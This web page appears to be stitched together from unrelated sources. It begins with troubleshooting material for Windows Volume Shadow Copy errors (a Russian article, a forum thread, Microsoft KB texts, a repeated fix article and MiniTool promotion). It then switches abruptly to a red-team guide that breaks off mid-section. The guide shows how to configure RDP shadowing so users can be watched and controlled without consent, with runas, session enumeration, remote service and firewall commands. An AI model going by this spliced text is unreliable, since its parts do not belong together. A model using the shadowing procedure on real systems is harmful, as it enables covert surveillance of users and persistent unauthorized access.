Shadow error access is denied

Исправление ошибки VSS EventID 8193 в Windows Server 2016 Система мониторинга с одного из серверов с Windows Server 2016 при каждой загрузке сервера стала слать события с ошибкой службы теневого копирования томов в журнале Application с EventID 8193 от источника VSS: При этом сервер работает нормально, каких-то видимых проблем со службами нет. В списке […]

Содержание

  1. Исправление ошибки VSS EventID 8193 в Windows Server 2016
  2. Volume shadow copy service error access is denied
  3. Question
  4. Answers
  5. All replies
  6. «Access is denied» error when you perform a backup or run «vssadmin list writers» on a cluster node in Windows Server 2012
  7. Symptoms
  8. Cause
  9. Resolution
  10. Hotfix information
  11. Prerequisites
  12. Restart requirement
  13. Hotfix replacement information
  14. Volume Shadow Copy Service Error: Unexpected error querying for the IVssWriterCallback interface — how to fix that
  15. Solution 1: Registry settings
  16. Solution 2: COM Security Settings

Исправление ошибки VSS EventID 8193 в Windows Server 2016

Система мониторинга с одного из серверов с Windows Server 2016 при каждой загрузке сервера стала слать события с ошибкой службы теневого копирования томов в журнале Application с EventID 8193 от источника VSS:

При этом сервер работает нормально, каких-то видимых проблем со службами нет. В списке модулей VSS также нет ошибок для ID этого экземпляра VSS Writer:

vss list writers

Данная ошибка довольно старая и обычно связана с установкой DHCP роли на сервер Windows Server 2008 (и выше), после которого у учетной записи Network Service пропадают права на ветку реестра HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesVSSDiag.

Проблема связана с установкой модуля теневого копирования VSS — DHCP Jet Writer, отвечающего за корректное создание теневых копий DHCP службы, который изменяет права на ветку.

Чтобы исправить ошибку нужно вручную с помощью редактора реестра предоставить полные права для Network Service на указанную ветку.

  1. Запустите regedit.exe;
  2. Перейдите к ветке HKLMSYSTEMCurrentControlSetservicesVSSDiag и откройте окно с правами на ветку реестра (пункт Permissions в контекстном меню);
  3. В списке разрешений найдите Network Service и в разрешениях предоставьте полный доступ (Full Control).

Вместо ручной правки реестра более правильнее было бы восстановить стандартные права на нее с помощью утилиты командной строки SubInACL. Скачайте и установите утилиту, (если это еще не сделано) и выполните следующие команды:

В Windows Server 2008 R2 команда будет такая (согласно KB Microsoft):

Затем в редакторе реестра нужно выполнить замену разрешений на вложенные объекты. Для этого откройте свойства ключа Diag и выполните “Permissions” -> “Advanced” -> “Replace all child object permissions ….».

Осталось перезагрузить Windows.

PS. Уже в процесса написания статьи обнаружил что существует еще одна ошибка VSS с таким же (. ) EventID 8193 с описанием:

Чтобы статья была более полной, оставлю тут метод решения и этой ошибки.

Данная ошибка препятствует выполнению резервному копирования системы (System State Backup) с помощь Windows Server Backup, который завершается с ошибкой “0x80042308: The specified object was not found ».

Проблема решается по другому и связана с наличием некорректной записи в ветке реестра с профилями пользователей HKLMSoftwareMicrosoftWindows NTCurrentVersionProfileList. Связано с тем, что служба VSS (компонент Shadow Copy Optimization Writer ) не может найти профиль пользователя с SID, оканчивающимся на .bak и выпадает в ошибку. Нужно удалить ключ реестра, который указан в описании события ConvertStringSidToSid(S-1-5-21-2470146651-3958396388-212345117-21232.bak).

  1. Откройте regedit.exe;
  2. Перейдите в ветку HKLMSoftwareMicrosoftWindows NTCurrentVersionProfileList;
  3. Найдите и удалите ветку реестра с суффиксом .bak;
  4. Перезагрузите сервер и попробуйте выполнить резервное копирование.

Источник

Volume shadow copy service error access is denied

Question

Discovered an issue that I can reproduce at will. Default full install of 2008 R2 build 7600, if I complete the server install and add the DHCP role, every server start results in the following Application Event Log:

Volume Shadow Copy Service error: Unexpected error calling routine RegOpenKeyExW(-2147483646,SYSTEMCurrentControlSetServicesVSSDiag. ). hr = 0x80070005, Access is denied.

In addition to the startup instance of the event, it will also recur at will by doing a net stop/start of cryptsvc resulting in the same event in the application log. If DHCP is not installed, it is completely happy. Uninstalling the DHCP role does not clear the error, though an «upgrade» install of Server after removing DHCP does clear it. I miss the old repair install capability 🙁

This error does not prevent the functioning of DHCP or any other component of the server that I have found in my brief testing, but I am concerned about putting it in to production to later find out what trouble might arise down the road.

Answers

Perhaps my mistake was I never really asked a question. I only stated my findings. I guess my question would be does anyone know how to eliminate the error without resorting to not running DHCP, or secondarily, any thoughts on if it is a serious issue and what problems could pop up later, and/or can it perhaps be safely ignored?

Following another path. Are either of you gentlemen who are also experiencing the error seeing any impact as a result, or does the server and the DHCP service seem to be operating normally despite the event log error? Any concerns other than curiosity due to the error involving two seemingly unrelated services: DHCP and VSS?

Nice find on the jcarle site, I appreciate that. I would however consider that to be more of a workaround than a fix. If you extend that solution to a ridiculous level and gave «Everyone» full control to every registry key, it would also «fix» the VSS error, but you would clearly not want to do that.

I would still be interested in knowing what the relationship between DHCP and the VSS service are, if the install of DHCP is incorrectly applying some settings or creating an association somewhere in error, and is potentially known and being worked on for a fix. I would also like to know of any potential downside to modifying those permissions in the suggested workaround, and if there is any exceptional risk to taking that path. The other possibility would be a confirmation that there is no real problem and it is fine to just live with the error in the log vs. modifying security settings unnecessarily or taking any other action at all.

It’s always simple :).
When DHCP server is installed it incorrectly rewrites permissions on [. CurrentControlSetServicesVSSDiag] key (and all subkeys).
Here are some details:

1)key permissions BEFORE dhcp installation (SDDL):
/sddl=O:SYG:SYD:PARAI(A;;KA;;;BA)(A;;KA;;;SY)(A;;CCDCLCSWRPSDRC;;;BO)(A;;CCDCLCSWRPSDRC;;;LS)(A;;CCDCLCSWRPSDRC;;;NS)(A;IO;RC;;;OW)(A;;KR;;;BU)(A;CIIO;GR;;;BU)(A;CIIO;GA;;;BA)(A;CIIO;GA;;;BO)(A;CIIO;GA;;;LS)(A;CIIO;GA;;;NS)(A;CIIO;GA;;;SY)

2)and now what happens after «DHCP Server Role» is installed (SDDL):
/sddl=O:SYG:SYD:ARAI(A;CI;CCDCLCSW;;;S-1-5-80-3273805168-4048181553-3172130058-210131473-390205191)(A;ID;KR;;;BU)(A;CIIOID;GR;;;BU)(A;ID;KA;;;BA)(A;CIIOID;GA;;;BA)(A;ID;KA;;;SY)(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)

If you take a closer look — you’ll notice that this SDs (security descriptors) are quite different. BTW, SID starting with S-1-5-80-. — this is NT SERVICEDHCPServer.

Now let’s get back to our «Access Denied» error.
On any 2008(R2) Server we always have service «Cryptographic Services» running and set to Autostart. And it runs under NetworkService account. Every time when this service is started it initializes it’s «VSS Writer» (VSS provider used to backup local cert stores). And this VSS provider tries to get Read/Write access to our key (. Diag). As it does that from inside CryptSvc service — it uses NetworkService account to get this access.
But inside the second SD there is no permission for NetworkService at all ! So, we have our error messsage in event log every time CryptSvc starts.

Now how to revert that changes to system original? I used subinacl utility from 2003 resource kit tools (you have to download an updated version v5.2.3790.1180 from MS site) like this:

subinacl /keyreg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesVSSDiag /sddl=O:SYG:SYD:PARAI(A;;. here goes original SD — from 1) . GA;;;SY)

But after that you have to open REGEDIT, navigate to [. Diag] key, open it’s permissions -> Advanced -> «Replace all child object permissions . » -> Ok -> Ok.

Only after that you’ll have system original permissions on that key and all subkeys.

Источник

«Access is denied» error when you perform a backup or run «vssadmin list writers» on a cluster node in Windows Server 2012

Symptoms

Consider the following scenario:

You’re using a cluster that’s running Windows Server 2012 or Windows Server 2012 R2.

You perform a backup or run the vssadmin list writers command on one of the cluster nodes.

Note For more information about this command, see vssadmin list writers.

In this scenario, the backup or list writer operation may log the following error in the Application log on all cluster nodes other than the node that you ran the command on:

Source: VSS
Event ID: 8194
Task Category: None
Level: Error
Keywords: Classic
Description:
Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface. hr = 0x80070005, Access is denied.

Cause

This problem occurs because of a permissions issue between the cluster service and the System Writer. The Cluster service on the backup node acts as a requester and queries information on the non-backup nodes. The Cluster service fails this query with an «Access Denied» error because System Writer runs as a network service that is not permitted by the cluster services COM permissions.

Resolution

Hotfix information

A supported hotfix is available from Microsoft Support. However, this hotfix is intended to correct only the problem that is described in this article. Apply this hotfix only to systems that are experiencing the problem described in this article. This hotfix might receive additional testing. Therefore, if you are not severely affected by this problem, we recommend that you wait for the next software update that contains this hotfix.

If the hotfix is available for download, there is a «Hotfix download available» section at the top of this Knowledge Base article. If this section does not appear, contact Microsoft Customer Service and Support to obtain the hotfix.

Note If additional issues occur or if any troubleshooting is required, you might have to create a separate service request. The usual support costs will apply to additional support questions and issues that do not qualify for this specific hotfix. For a complete list of Microsoft Customer Service and Support telephone numbers or to create a separate service request, go to the following Microsoft website:

http://support.microsoft.com/contactus/?ws=supportNote The «Hotfix download available» form displays the languages for which the hotfix is available. If you do not see your language, it is because a hotfix is not available for that language.

Prerequisites

To apply this hotfix on Windows Server 2012, there are no prerequisites for installing this hotfix.

To apply this hotfix on Windows Server 2012 R2, you must first have update 2919355 installed.

Restart requirement

You must restart the computer after you apply this hotfix.

Hotfix replacement information

This hotfix does not replace any previously released hotfix.

Источник

Volume Shadow Copy Service Error: Unexpected error querying for the IVssWriterCallback interface — how to fix that

Table of Contents

If you’ve setup some native or third-party backup procedures on your system (in our case we had Cobian Backup) it might happen to stumble upon the following error message in the Event Viewer log:

The issue, as the error says, is most likely related to the lack of permissions of the Volume Shadow Copy service.

Solution 1: Registry settings

The first thing you should try in order to solve the issue is to add the appropriate permissions for the account executing the service: you can do that my altering the registry settings of the affected machine. Here are the required steps to do that:

  • open the service manager interface (Start > Run > services.msc).
  • look for the Volume Shadow Copy service and ensure it’s running: if it’s stopped, make it start and set up its esecution to Automatic, then see if the problem is gone. If it is, you’re fixed it, unless you’ll have to keep reading.
  • take notice of the Volume Shadow Copy service execution account: for example, it could be .Administrator, Network Service, Local System or some other system account.
  • open up the registy editor (Start >Run >regedit).
  • navigate up to HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet>Services>VSS>VssAccessControl
  • Create a DWORD key and give it a value of 1 and a key name equal to the fully-qualified name of the system account used by the service, such as:
    • For the .Administrator account, use the key .Administrator.
    • For the Network Service account, use the key NT AuthorityNetworkService.
    • For the Local System account, use the key NT AuthoritySYSTEM.

The following image, included only as an example, allows the execution of the VSS to all the aforementioned system accounts:

You don’t need to do that, just adding the account used by the VSS service should be more than enough to solve your issue.

If the first solution doesn’t work, you can try to grant to SYSTEM and NETWORK SERVICE access to the machine’s Component Services. In order to do that you need to perform the following steps:

  • open the Component Services management panel (Start > Run > dcomcnfg).
  • on the right-side of the newly-opened windows, expand the Component Services >Computers >My Computer nodes.
  • right-click on My Computer and select Properties from the contextual menu.
  • in the newly-opened window, select the COM Security tab.
  • look up for the Access Permissions options panel and click to the Edit Default button.
  • in the newly-opened window, add the SYSTEM and Network Service users (if not already there) and grant them the Local Access permission by activating the proper checkbox.
  • close everything and restart the machine.

The following screenshot shows how you can perform all these steps.

Источник

Windows Server 2012 Windows Server 2012 R2 Windows Server 2016 Windows Server 2019 Windows Server version 20H2 Windows Server 2022 More…Less

Summary

After you install the June 14, 2022 or a later Windows update, operations related to shadow copies (creation or deletion) on an Application Server running VSS aware Server Applications that store data on remote SMB 3.0 or later file shares may fail for SMB shares hosted on a File Server. This issue could occur because of one of the following reasons:

  • The shadow copy creation operation fails. This issue occurs if the Application Server has not been updated to the June 14, 2022 Windows update but the File Server is updated.

    To resolve this issue, install the June 14, 2022 or newer Windows update on the Application Server as well as the File Server.

  • The account used to perform the shadow copy operation is a local account that has Administrator or Backup Operator privileges on the File Server.

    To resolve this issue, do one of the following:

    • Switch to a domain account (recommended)

    • Disable UAC remote restrictions on the File Server (not recommended)

  • The account used to perform copy operations does not comply with the privilege requirements for Administrators or Backup Operators.

    To resolve this issue, use a domain account that is part of the Local Administrators or Backup Operators group on the File Server.

Symptoms for these issues

After installing the June 14, 2022 or later Windows update, backup applications may receive error E_ACCESSDENIED while executing operations related to shadow copy creation. Additionally, a FileShareShadowCopyAgent Event 1013 is logged in the Microsoft-Windows-FileShareShadowCopyAgent/Operational channel (enabled by default) on the File Server.

Event 1013

Microsoft File Share Shadow Copy Agent Error: The client connecting to the FssAgentRPC server did not have Local Administrator or Backup Operator privilege on this machine.

Cause

These issues occur because of security enforcement in the Remote VSS for File Shares (RVSS) agent service as addressed by CVE-2022-30154 | Microsoft File Server Shadow Copy Agent Service (RVSS) Elevation of Privilege Vulnerability.

More information

To resolve the issue, install the Windows update dated June 14, 2022 or a later Windows update on both the Application Server and on the File Server. Failure to install the update on both machine roles could cause operations performed by applications that previously worked to stop working.

This issue was introduced by the Windows updates dated June 14, 2022.

Windows OS

Introduced in Windows update

Windows Server 2022

KB5014678

Windows 10, version 20H2

KB5014699

Windows Server 2019

KB5014692

Windows Server 2016

KB5014702

Windows Server 2012 R2

KB5014746

Windows Server 2012

KB5014747

To resolve these issues, install the Windows update date June 14, 2022 or later on both the Application Server and on the File Server or perform configuration changes as described in the «Summary» section. 

References

Protect Data on Remote SMB File Shares using VSS

Need more help?

This article illustrated by MiniTool official website mainly explains what error “Volume Shadow Copy Service warning VSS was denied access to the root of volume” is, what cause it, as well as how to fix it. It also introduces another related VSS error that you may be interested in.

“Event ID 12348 – Volume Shadow Copy Service warning: VSS was denied access to the root of volume…” Have you ever encountered this kind of error, maybe while using disk2vhd to create a virtual hard disk (VHD)? How do you deal with this problem? Or, are you still suffering from this type of issue? Then, you can find a solution below.

About the Error

Volume Shadow Copy Service warning: VSS was denied access to the root of volume\?Volume{3dda6e5b-ed17-11df-a869-c2b558ad3773}Denying administrators from accessing volume roots can cause many unexpected failures, and will prevent VSS from functioning properly. Check security on the volume, and try the operation again.

This is a sample of the VSS service error message. Yours may be a little bit different, especially for the random serial number or alphanumeric string. This error is often related to a Q: drive that is created after installing Microsoft Office.

This is one of the errors that you may come across while using Macrium Reflect or Acronis True Image to create a disk image. It is due to VSS’s lack of access to the target volume’s root directory. Or, it may be due to that VSS writers can’t start properly or cannot close properly. Installing or upgrading the operating system (OS) can also result in this error.

#1 Ensure Volume Shadow Copy Service (VSS) Has Volume Root Directory Access

According to the error message “Volume Shadow Copy Service warning: VSS was denied access to the root of volume”, the process fails due to VSS does not have access to the root directory of the target volume. So, to solve the problem, the most direct way is to enable access to the volume root for the VSS.

  1. To achieve that, first of all, you must have administrative authority. That is to say, you must log in as an administrator or a member of administrators.
  2. Then, you need to open an elevated command prompt Just search “cmd” in Windows Search and run CMD.exe as administrator. You may need to provide an administrator password or confirm the opening.
  3. Input icacls <VolumeRootPath> /grant system:f in the command prompt and press Enter Note that <VolumeRootPath> refers to the path to the volume root directory like Q:. As for the sample error above, you can replace <VolumeRootPath> with \?Volume{3dda6e5b-ed17-11df-a869-c2b558ad3773}.

grant root access of volume Q to system

You may need to perform the above instructions while temporarily closing the third-party security software, turning off UAC (user account control), or booting into a clean boot mode. By performing the above command, you have given the system the full control permissions of Q:.

#2 Ensure VSS Is Running

Also, you need to make sure Volume Shadow Copy Service is running.

  1. Open the Windows Services app by searching it in Windows Search.
  2. Scroll down the list to find Volume Shadow Copy.
  3. Check the Status of Volume Shadow Copy. If it is running. Close the window to exit. If not, double-click on it to open its Properties. There, set its startup type to Automatic and click the Start button.
  4. Finally, click Apply > OK.

start Volume Shadow Copy Service (VSS)

#3 Repair Damaged System Files

You can run System File Checker (SFC) to check and repair any missing or damaged system files. Just type sfc /scannow in CMD and press Enter. Then, wait patiently for the scan result.

#4 Exclude Drive Q from Backup

Since the error appears when trying to back up disk Q, you can simply exclude the Q disk from your backup list if there isn’t anything important on it.

#5 Restart the PC

Also, simply restarting your machine may help you fix your issue. After restarting your computer, retry the operation to see if you still receive the “Volume Shadow Copy Service warning: VSS was denied access to the root of volume…” error.

#6 Uninstall Third-Party Backup App

Sometimes, the error may also be caused by a 3rd party backup program. If you happen to have backup software installed on your computer, you can try to uninstall it to handle the problem.

#7 Uninstall MS Office

Although not recommended, this does is a possible way to deal with the VSS failure since the related volume is created after installing the Office app.

Or, as Microsoft Office is necessary, you can just leave the error message alone since it isn’t actually a real problem.

Other Possible Solutions

In addition to the above methods, you can try the below solutions if none of the above ones work for you.

  • Update Macrium Reflect or Acronis True Image.
  • Update Windows, reset the system, or reinstall OS.
  • Clear out the java cache directory files.
  • Ask for help from Macrium or Acronis support.
  • Contact the computer manufacturer for help.

Create Disk Image with Another Backup Software

Since the “Volume Shadow Copy Service warning: VSS was denied access to the root of volume” error is an error while using Macrium Reflect or Acronis True Image (both are data backup and clone tools), you can rely on another professional and reliable backup program like MiniTool ShadowMaker to create a system image or disk image.

Free Download

1. Download and install MiniTool ShadowMaker on your computer.

2. Click the Keep Trial option if it asks you to buy its full version. Thus, you can enjoy all its features for 30 days.

3. Then, it will enter its main user interface (UI). There, navigate to the Backup tab from the top menu.

MiniTool ShadowMaker Backup tab

4. In the Backup tab, there are Source and Destination If you want to back up your system, just keep the default selection of the source module. If you want to create a hard disk drive image, click on the Source module, select Disk and Partitions, and select the target disk and all the partitions on the target disk. Click OK to save the selection.

select all partitions on target disk as a backup source

5. Click on the Destination module and choose a place to save the disk image. An external hard drive is recommended.

6. Finally, click the Back up Now button to start the process.

You can take advantage of the Clone Disk utility under MiniTool ShadowMaker’s Tools tab to create an exact copy of the target disk, including partition table and disk structure. Besides, this program can also back up and sync files/folders, boot clients from the network, create bootable media, manage remote computers within the LAN (local area network), etc.

Error: The shadow copy provider had an unexpected error while trying to process the specified command.»

Right clicking on the C: volume and clicking «Configure Shadow Copies…», the following error is shown:

«Failed to retrieve volumes that are eligible for shadow copies.

Error 0x8004230f: The shadow copy provider had an unexpected error while trying to process the specified operation.

Besides, in the event log, you can see the VSS event 12348, 12293, and 8193.

This is a server backup issue. On a Windows Server machine, when you install App-V 4.6, Q (or another driver letter) drive will be created. If you try to make use of Windows Server Backup on the host computer to conduct online backup of Hyper-v guest PC and try to use commands vssadmin list volumes or vssadmin list shadowstorage, you will get the above error message.

Also read: Quick Fix Volume Shadow Copy Service Errors (for Windows 10/8/7)

Q drive here is the location where you can store files while you are sequencing an app from App-V. the App-v drive that you specify must be accessible on targeted PCs. Otherwise, you need to select a different drive letter.

Actually, the above error is caused by the additional Q drive, which isn’t an NTFS file system preventing a backup from being processed. To handle such a situation, you can do either of the following fixes.

  • Uninstall App-V.
  • Install the hotfix from Microsoft: Hotfix Package 4 for Microsoft Application Virtualization 4.6 RTM: October 2010.

Tip: All disks being used by the virtual machine are configured within the guest OS as NTFS-formatted basic disk. Virtual machines that use dynamic disks or the FAT32 file system prevent an online backup from being performed.

Conclusion

After reading this article, have you learned what error “Volume Shadow Copy Service warning: VSS was denied access to the root of volume” is and why does it occur? Do you find a solution above to save your situation? If you have any further questions about this error code or have different/further ideas related, feel free to leave a comment below.

If you encounter any problem while using MiniTool ShadowMaker, or if you get the same error during operating MiniTool ShadowMaker and can’t solve it with all the solutions described in this post, just contact the MiniTool support team at [email protected] and you will get an instant reply.

Triangolo giallo sull'icona Rete di Windows: cosa significa e come eliminarlo

If you’ve setup some native or third-party backup procedures on your system (in our case we had Cobian Backup) it might happen to stumble upon the following error message in the Event Viewer log:

Error

Message : Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.

hr = 0x80070005, Access is denied.

This is often caused by incorrect security settings in either the writer or requestor process.

The issue, as the error says, is most likely related to the lack of permissions of the Volume Shadow Copy service.

Solution 1: Registry settings

The first thing you should try in order to solve the issue is to add the appropriate permissions for the account executing the service: you can do that my altering the registry settings of the affected machine. Here are the required steps to do that:

  • open the service manager interface (Start > Run > services.msc).
  • look for the Volume Shadow Copy service and ensure it’s running: if it’s stopped, make it start and set up its esecution to Automatic, then see if the problem is gone. If it is, you’re fixed it, unless you’ll have to keep reading.
  • take notice of the Volume Shadow Copy service execution account: for example, it could be .AdministratorNetwork ServiceLocal System or some other system account.
  • open up the registy editor (Start > Run > regedit).
  • navigate up to HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet>Services>VSS>VssAccessControl
  • Create a DWORD key and give it a value of 1 and a key name equal to the fully-qualified name of the system account used by the service, such as:
    • For the .Administrator account, use the key .Administrator.
    • For the Network Service account, use the key NT AuthorityNetworkService.
    • For the Local System account, use the key NT AuthoritySYSTEM.

The following image, included only as an example, allows the execution of the VSS to all the aforementioned system accounts:

volume-shadow-copy-services-vss-access-control

You don’t need to do that, just adding the account used by the VSS service should be more than enough to solve your issue.

Solution 2: COM Security Settings

If the first solution doesn’t work, you can try to grant to SYSTEM and NETWORK SERVICE access to the machine’s Component Services.  In order to do that you need to perform the following steps:

  • open the Component Services management panel (Start > Run > dcomcnfg).
  • on the right-side of the newly-opened windows, expand the Component Services > Computers > My Computer nodes.
  • right-click on My Computer and select Properties from the contextual menu.
  • in the newly-opened window, select the COM Security tab.
  • look up for the Access Permissions options panel and click to the Edit Default button.
  • in the newly-opened window, add the SYSTEM and Network Service users (if not already there) and grant them the Local Access permission by activating the proper checkbox.
  • close everything and restart the machine.

The following screenshot shows how you can perform all these steps.

volume-shadow-copy-services-com-settings

A while ago on a Sunday afternoon I was playing with an old laptop to repurpose it to be a media center for the TV. Because I prefer to use Windows’ built-in solutions over 3rd party tools, after a quick online research, I discovered that Microsoft Remote Desktop Protocol (RDP) supports a so-called “shadowing” feature and RDP is available in all Windows Server Operating Systems and the business editions of end-user Windows versions.

This shadowing feature means that, while someone is working on their machine, either physically on the console or via RDP, it is possible for another user to view that session, or even control it! This is of course ideal for my use case with the laptop connected to the TV. I am able to control the laptop connected to my TV from the couch while the TV displays what I want to see. Think of Netflix, a YouTube video or family pictures. If I would have simply used RDP to logon to the media center, it would have displayed a lock screen on the TV, which defeats the purpose of the media center setup.

This feature also immediately triggered my hacker mindset. Despite an increased usage of Windows Remote Management (WinRM), system administrators still make extensive use of RDP. Moreover, many organizations provide access to internal resources using RDP. We as Red Teamers, can also use this feature during a Red Team exercise to spy on both system administrators and users, without dropping any additional binaries on remote systems and while blending in with regular network traffic. Additionally it is possible to use the shadowing feature if the Remote Desktop port is blocked by a firewall, but the SMB port is open (yes, you read this correctly – RDP via TCP port 445). Lastly, it is possible to use this feature to create a backdoor on a remote system where a low privileged user can view and take over sessions of high-privileged users to again obtain a foothold in the network.

Demo

This demo video (no audio) shows how a remote system is configured to allow shadowing without consent. The steps in this video will be explained in the remainder of the article.

Your browser does not support the video tag.

Let’s first dive a bit deeper into Microsoft RDP’s shadowing feature. Shadowing can be performed either locally between users on the same machine as well as remotely, shadowing a user on a remote machine.

There are two implementations of the shadowing feature. The old implementation, which was part of Windows 7, its server counterpart Windows Server 2008 R2 and earlier versions of Windows, were part of the Remote Desktop Services service (termsrv.dll). Now this functionality has moved to separate binaries. In the old implementation on the client side the shadow.exe command line tool was used to initiate a shadowing session. This command line tool was included in Windows versions up to Windows 7/Windows Server 2008 R2.

The new implementation of the shadowing feature is implemented from Windows 8.1 and its server counterpart Windows Server 2012 R2. After performing the initial negotiation and setting up the session, the Remote Desktop Services service spawns the RdpSaUacHelper.exe, RdpSaProxy.exe and RdpSa.exe processes which take care of the actual shadowing. On the client side, the Remote Desktop Connection (mstsc.exe) tool is used. In this article we will focus on the new implementation.

Between the old implementation of the shadowing feature on Windows 7/Server 2008 R2 and the new implementation on Windows 8.1/Server 2012 R2, there has been another Windows version namely Windows 8/Server 2012. These Operating Systems however do not support any of the two shadowing implementations.

In order to use the RDP shadowing feature, the Remote Desktop Services (TermService) service needs to be running (which it does by default), a rule needs to be enabled in the Windows Firewall and in case of Red Teaming for stealth reasons, a setting needs to be configured to not prompt the user for permission when they are being shadowed. In this article we are walking through the steps to set this up.

Shadowing configuration

The configuration for shadowing only has a single setting which defines whether the shadowed user will get a prompt and whether it is possible to only view a session or also control it. This setting can be configured through Group Policy:

  • Path: Computer Configuration -> Policies -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Session Host -> Connections
  • Name: Set rules for remote control of Remote Desktop Services user sessions

RDP Shadowing in Group Policy

Because we want to be stealthy and not modifying a group policy in order to target a specific machine, we will focus on configuring this setting specifically in the target machine’s registry. In the Windows registry, this setting is represented as the Shadow DWORD value in the HKLMSoftwarePoliciesMicrosoftWindows NTTerminal Services key.

The value of this key defines a combination of the following settings:

  • Controls whether shadowing is allowed or not
  • Whether it is possible for the user shadowing to also interact with the session
  • Whether the user being shadowed will need to approve the incoming shadowing request

The following values can be set to configure the above settings1.

Value Name Description
0 Disable Remote control is disabled.
1 EnableInputNotify The user of remote control has full control of the user’s session, with the user’s permission.
2 EnableInputNoNotify The user of remote control has full control of the user’s session; the user’s permission is not required.
3 EnableNoInputNotify The user of remote control can view the session remotely, with the user’s permission; the remote user cannot actively control the session.
4 EnableNoInputNoNotify The user of remote control can view the session remotely, but not actively control the session; the user’s permission is not required.

By default, the Shadow value does not exist in the registry in which case the value is set to 1. This will not allow to shadow a user without first prompting for consent. Because during Red Team exercises we do not want to alert any user of us peeking on their desktop, we will set that value to 2, so we can both peek and, if needed, control their desktop without them providing us consent. The Remote Desktop setting in SystemPropertiesRemote.exe does not need to be enabled to allow shadowing; if a user is logged in locally and the Remote Desktop is disabled, the user can still be shadowed. The Remote Desktop Services (TermService) service does need to be running though.

Remote Monitoring Request

To be able to shadow, a Windows client is required as there are no open source Remote Desktop clients (yet) which support the Remote Desktop shadowing protocol. This Windows client can either be a machine in the target network which has already been compromised or an offensive Windows (virtual) machine, which using a (SOCKS) tunnel has access to the target network.

Authentication

With these prerequisites in place, let’s get to the practical part.

In order to shadow a session, we first need to make sure we are authorized to access the remote system; either an account with administrative access to the remote host is required, a user or group which has been added to the Remote Desktop Users group or an entity which has been explicitly provided access to the Remote Desktop authorization list. This latter approach will be detailed in the Backdoor section of this article.

A command shell with a custom authentication having sufficient rights can be launched using for example the runas.exe command line tool with the /netonly flag. Any processes launched from the process started using runas.exe will inherit the security tokens of the parent process and use them in case the remote host requires authentication. The runas.exe command line will then look as follows, where the domain can also be the target computer name in case of local (non-domain) credentials.

C:>runas.exe /noprofile /netonly /user:MYSERVERAdministrator powershell.exe
Enter the password for MYSERVERAdministrator:
Attempting to start powershell.exe as user "MYSERVERAdministrator" ...
 
C:>

Other tools like Rubeus and Kekeo can also request the appropriate Kerberos tickets in order to authenticate.

Query interactive sessions

Once the command shell is running with the appropriate security tokens, the remote system can be queried to identify the interactive sessions. There are various command line utilities which can show the sessions on a remote system. You can use the command below or one of its equivalents query.exe user /server:MYSERVER or qwinsta.exe /server:MYSERVER. Alternatively, NoPowerShell’s Get-WinStation cmdlet2 with the -ComputerName MYSERVER parameter can be used. This can also be executed in-memory using for example Cobalt Strike’s execute-assembly command. All these commands communicate over the Microsoft-DS port (445/TCP).

PS C:> quser.exe /SERVER:MYSERVER
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator         console             1  Active      none   2/2/2021 11:09 AM
 domainuser2           rdp-tcp#0           2  Active          .  2/2/2021 11:10 AM
PS C:>

In the output, the logged in users are displayed, their session ID and some other details like logon time and idle time. This session ID will be used in the coming steps. This command will only return output if there are users logged in and the user running the query has the WINSTATION_QUERY privilege (explicitly or implicitly via group membership assigned to them). By default, this privilege is held by members of the Administrators, Remote Desktop Users and INTERACTIVE group. More about this privilege is detailed later in the Shadowing backdoor section. It is also possible to skip this step altogether and simply guess the session ID in the next steps, starting from 1 and increasing one at a time.

Configuring RDP Shadowing

Before shadowing the remote machine, first a couple of settings on the target host need to be validated, and possibly updated. There are several ways to view and change these settings and depending on the configuration of firewalls and types of traffic on the network in which you want to blend in, it is possible to choose which protocol to use.

Besides the option of using the Microsoft-DS service (445/TCP) used by commands like sc.exe, reg.exe, netsh.exe and the Microsoft Management Console (mmc.exe), configuration of the remote machine can also be performed through WinRM/WMI which are respectively running on port 5985/TCP and/or 5986/TCP and 135/TCP. In PowerShell, the DCOM connection to the remote host can be established using the following two lines:

$so = New-CimSessionOption -Protocol Dcom
$s = New-CimSession -ComputerName MYSERVER -SessionOption $so

The $s variable contains the session and will be used in all subsequent sections. Alternatively WinRM can be used by removing the -SessionOption parameter.

For more information about WMI, check my previous article on Extracting credentials from a remote Windows system — Living off the Land here.

Enabling RDP Shadowing

Before the RDP shadowing feature can be used from a remote host, the Remote Desktop Services (TermService) service needs to be running and the Remote Desktop — Shadow (TCP-In) rule needs to be enabled in the firewall. If the target machine is already used via Remote Desktop (quser.exe output shows RDP-Tcp session names), this step can be skipped. In case users access the machine only physically (so not using Remote Desktop), this step might be required.

TermService service

Check if service is running using either the Service Manager (445/TCP) via sc.exe or the Microsoft Management Console (mmc.exe), or via WMI over DCOM or WinRM using the $s CimSession variable described earlier. If not, service should be started.

Option #1: Service Manager

Query

sc.exe \MYSERVER query TermService

Start

sc.exe \MYSERVER start TermService

Option #2: WMI

Query

$tssvc = Get-CimInstance -Filter 'Name="TermService"' -ClassName Win32_Service -CimSession $s
$tssvc

Start

$tssvc | Invoke-CimMethod -MethodName StartService

Option #3: Service Manager via GUI

Query

Launch mmc.exe from the powershell.exe instance created in the Authentication section so it inherits the appropriate security tokens. Navigate to File -> Add/Remove Snap-In (Ctrl + M) and add the Services snap-in to the console. While adding the snap-in, make sure to specify the Another computer machine name, where the computer name or IP address of the target is entered.

Launch service on remote machine

Start

Simply right click the Remote Desktop Services service and choose Start.

Shadow firewall rule

In order to access the named pipe set up by the RdpSa.exe process while initiating the shadowing session, the Remote Desktop — Shadow (TCP-In) firewall rule needs to be enabled. Similarly to the Remote Desktop Services service, we will first check if it has already been enabled, and if not, we will enable it.

Option #1: WMI

Query

$fwrule = Get-CimInstance -Namespace ROOTStandardCimv2 -ClassName MSFT_NetFirewallRule -Filter 'DisplayName="Remote Desktop - Shadow (TCP-In)"' -CimSession $s
$fwrule

Enable

$fwrule | Invoke-CimMethod -MethodName Enable

Option #2: Firewall Manager via GUI

